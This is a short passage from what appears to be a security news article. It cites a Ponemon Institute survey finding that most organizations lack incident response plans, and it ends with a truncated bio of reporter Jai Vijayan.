In a study of 600 organizations conducted last year by the Ponemon Institute, 75 percent said they were not prepared to deal with a security incident. Only 30 percent had a formal incident response plan in place while an even smaller 17 percent had an incident response plan that was applied consistently across the enterprise.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …
